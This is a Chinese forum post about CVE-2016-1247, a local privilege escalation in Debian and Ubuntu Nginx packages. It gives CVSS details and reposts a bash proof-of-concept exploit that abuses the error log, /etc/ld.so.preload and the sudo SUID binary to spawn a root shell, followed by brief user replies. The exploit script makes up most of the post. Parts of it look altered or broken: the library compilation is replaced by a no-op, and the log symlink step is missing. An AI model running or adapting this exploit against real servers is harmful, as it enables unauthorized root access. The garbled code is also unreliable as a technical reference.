CVE-2016-1247：Debian、ubuntu发行版的Nginx本地提权漏洞

opelnic

CVE-2016-1247：Debian、ubuntu发行版的Nginx本地提权漏洞

1. 
   
2. CVSS分值:         7.2         [严重(HIGH)]
   
3. 机密性影响:         COMPLETE         [完全的信息泄露导致所有系统文件暴露]
   
4. 完整性影响:         COMPLETE         [系统完整性可被完全破坏]
   
5. 可用性影响:         COMPLETE         [可能导致系统完全宕机]
   
6. 攻击复杂度:         LOW         [漏洞利用没有访问限制 ]
   
7. 攻击向量:         LOCAL         [漏洞利用需要具有物理访问权限或本地帐户]
   
8. 身份认证:         NONE         [漏洞利用无需身份认证]
   
9. 
   
10. 
    
11. 来源 http://cve.scap.org.cn/CVE-2016-1247.html
    

复制代码

POC

1. 
   
2. #!/bin/bash
   
3. #
   
4. # Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
   
5. # nginxed-root.sh (ver. 1.0)
   
6. #
   
7. # CVE-2016-1247
   
8. #
   
9. # Discovered and coded by:
   
10. #
    
11. # Dawid Golunski
    
12. # dawid[at]legalhackers.com
    
13. #
    
14. # https://legalhackers.com
    
15. #
    
16. # Follow https://推特.com/dawid_golunski for updates on this advisory.
    
17. #
    
18. # ---
    
19. # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
    
20. # etc.) to escalate their privileges from nginx web server user (www-data) to root
    
21. # through unsafe error log handling.
    
22. #
    
23. # The exploit waits for Nginx server to be restarted or receive a USR1 signal.
    
24. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
    
25. # script which is called daily by the cron.daily on default installations.
    
26. # The restart should take place at 6:25am which is when cron.daily executes.
    
27. # Attackers can therefore get a root shell automatically in 24h at most without any admin
    
28. # interaction just by letting the exploit run till 6:25am assuming that daily logrotation
    
29. # has been configured.
    
30. #
    
31. #
    
32. # Exploit usage:
    
33. # ./nginxed-root.sh path_to_nginx_error.log
    
34. #
    
35. # To trigger logrotation for testing the exploit, you can run the following command:
    
36. #
    
37. # /usr/sbin/logrotate -vf /etc/logrotate.d/nginx
    
38. #
    
39. # See the full advisory for details at:
    
40. # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
    
41. #
    
42. # Video PoC:
    
43. # https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
    
44. #
    
45. #
    
46. # Disclaimer:
    
47. # For testing purposes only. Do no harm.
    
48. #
    
49. BACKDOORSH="/bin/bash"
    
50. BACKDOORPATH="/tmp/nginxrootsh"
    
51. PRIVESCLIB="/tmp/privesclib.so"
    
52. PRIVESCSRC="/tmp/privesclib.c"
    
53. SUIDBIN="/usr/bin/sudo"
    
54. function cleanexit {
    
55. # Cleanup
    
56. echo -e "\n[+] Cleaning up..."
    
57. rm -f $PRIVESCSRC
    
58. rm -f $PRIVESCLIB
    
59. rm -f $ERRORLOG
    
60. touch $ERRORLOG
    
61. if [ -f /etc/ld.so.preload ]; then
    
62. echo -n > /etc/ld.so.preload
    
63. fi
    
64. echo -e "\n[+] Job done. Exiting with code $1 \n"
    
65. exit $1
    
66. }
    
67. function ctrl_c() {
    
68.         echo -e "\n[+] Ctrl+C pressed"
    
69. cleanexit 0
    
70. }
    
71. #intro
    
72. cat <<_eascii_
    
73. _______________________________
    
74. < Is your server (N)jinxed ? ;o > -------------------------------
    
75.            \
    
76.             \          __---__
    
77.                     _-       /--______
    
78.                __--( /     \ )XXXXXXXXXXX\v.  
    
79.              .-XXX(   O   O  )XXXXXXXXXXXXXXX-
    
80.             /XXX(       U     )        XXXXXXX\
    
81.           /XXXXX(              )--_  XXXXXXXXXXX\
    
82.          /XXXXX/ (      O     )   XXXXXX   \XXXXX\
    
83.          XXXXX/   /            XXXXXX   \__ \XXXXX
    
84.          XXXXXX__/          XXXXXX         \__---->
    
85. ---___  XXX__/          XXXXXX      \__         /
    
86.    \-  --__/   ___/\  XXXXXX            /  ___--/=
    
87.     \-\    ___/    XXXXXX              '--- XXXXXX
    
88.        \-\/XXX\ XXXXXX                      /XXXXX
    
89.          \XXXXXXXXX   \                    /XXXXX/
    
90.           \XXXXXX      >                 _/XXXXX/
    
91.             \XXXXX--__/              __-- XXXX/
    
92.              -XXXXXXXX---------------  XXXXXX-
    
93.                 \XXXXXXXXXXXXXXXXXXXXXXXXXX/
    
94.                   ""VXXXXXXXXXXXXXXXXXXV""
    
95. _eascii_
    
96. echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"
    
97. echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
    
98. # Args
    
99. if [ $# -lt 1 ]; then
    
100. echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
     
101. echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
     
102. exit 3
     
103. fi
     
104. # Priv check
     
105. echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
     
106. id | grep -q www-data
     
107. if [ $? -ne 0 ]; then
     
108. echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"
     
109. exit 3
     
110. fi
     
111. # Set target paths
     
112. ERRORLOG="$1"
     
113. if [ ! -f $ERRORLOG ]; then
     
114. echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"
     
115. exit 3
     
116. fi
     
117. # [ Exploitation ]
     
118. trap ctrl_c INT
     
119. # Compile privesc preload library
     
120. echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
     
121. cat /dev/null 2>/dev/null
     
122. # Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily
     
123. # rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)
     
124. echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."
     
125. while :; do
     
126. sleep 1
     
127. if [ -f /etc/ld.so.preload ]; then
     
128. echo $PRIVESCLIB > /etc/ld.so.preload
     
129. rm -f $ERRORLOG
     
130. break;
     
131. fi
     
132. done
     
133. # /etc/ld.so.preload should be owned by www-data user at this point
     
134. # Inject the privesc.so shared library to escalate privileges
     
135. echo $PRIVESCLIB > /etc/ld.so.preload
     
136. echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"
     
137. echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
     
138. echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
     
139. chmod 755 /etc/ld.so.preload
     
140. # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
     
141. echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
     
142. sudo 2>/dev/null >/dev/null
     
143. # Check for the rootshell
     
144. ls -l $BACKDOORPATH
     
145. ls -l $BACKDOORPATH | grep rws | grep -q root
     
146. if [ $? -eq 0 ]; then
     
147. echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
     
148. echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"
     
149. else
     
150. echo -e "\n[!] Failed to get root"
     
151. cleanexit 2
     
152. fi
     
153. rm -f $ERRORLOG
     
154. echo > $ERRORLOG
     
155.   
     
156. # Use the rootshell to perform cleanup that requires root privilges
     
157. $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
     
158. # Reset the logging to error.log
     
159. $BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"
     
160. # Execute the rootshell
     
161. echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
     
162. $BACKDOORPATH -p -i
     
163. # Job done.
     
164. cleanexit 0
     

复制代码

用户名

已阅 不用客气

左手写爱

只会用落后的CENTOS

雨宫音羽

表示一向用nginx官方的源安装nginx包 而不是发行版的源。。无压力

另外本地提权其实。。影响力有限吧

lsza

Centos路过